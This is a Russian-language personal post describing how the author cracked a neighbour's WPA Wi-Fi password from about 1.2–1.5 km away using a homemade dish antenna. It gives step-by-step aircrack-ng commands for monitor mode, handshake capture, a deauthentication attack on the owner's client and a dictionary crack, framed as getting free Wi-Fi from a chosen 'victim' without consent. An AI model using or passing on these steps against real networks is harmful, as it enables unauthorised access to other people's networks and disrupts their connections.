Для начала прошу извинений за все далее написаны мною ошибки в тексте!!!
Как зделать халявный WI FI - такого вопроса мне никто не задавал
Да Я часто получал вопросы от своих клиентов поповоду типа
-
А WI FI сигнал нашего роутера на скоко мощный
-
А его взламать можно -
подобрать пароль
Я отвечал Он очень мощный!
и пароль и сигнал

После нескольких лет работы со спутниковым Тв для меня не составило труда найти для своих експерементов тарелку типа офсет 90
Спаял я надосуге Антенну для WI FI типа биквадрат закрепил его в место головки в фокус тарелки соединил кабелем 50 ом с
Wireless Lan TP-Link TL-WN722N Wireless N Atheros, 2T2R,2.4Ghz, 802.11 USB
ето дрянь такая USBишная для према Wi fi стоимостю примерно 14 - 15 $
-выбрал жертву расстояние между мной и жертвой примерно 1200 -1500 метров
-мощность сигнала за шкалой inSSIDER RSSI -43 ( даже очень супер)
также в проге inSSIDER я видел вид шифрования WPA
Вот и всьо ясно долбать надо WPA
Загрузилса с флешки там у меня дистрибутив backtrack 5
(как его установить на флешку далее опишу)
Набрал в консоли airmon-ng
Мне отобразилса список всех доступных WiFi адаптеров
У меня wlan0
Набрал в консоли
airmon-ng start wlan0 (переход в режим монитора )
дале начал искать жертву Зная что шифровка WPA зная сетевой адрес точки
Набрал в консоли airodump-ng --encrypt wpa mon0
(Да mon0 ето имя моего адаптера )
Нашол жертву запомнил сетевое имя (ESSID) сетевой адрес (BSSID) и канал (CH)
и начал атаку
Набрал в консоли airodump-ng -w test -c [CH] --bssid [BSSID] [mon0]
тоисть -w это параметр записи пакетов в файл сохраняетса в файл test-01.cap
Для непонятливых
(airodump-ng -w test -c [канал точки] --bssid [сетевой адрес точки] [имя вашего адаптера]
handshake (рукопожатие) изначально моя цель его поймать хозяин пользовалса интернетом то мне повезло долго не ждал
послал я ему пакет для деавторизации
Набрал в консоли aireplay-ng -0 1 -a [BSSID] -c [Client Mac] [mon0]
Через секунду я увидел в верхнем углу консоли надпись handshake
ето значит я поймал рукопожатие осталось его розшифровать
Набрал в консоли aircrack-ng -c test-01.cap -w путь к словарю
примерно через 5-6минут пароль был у меня ето 10 цифр которые были в моем словаре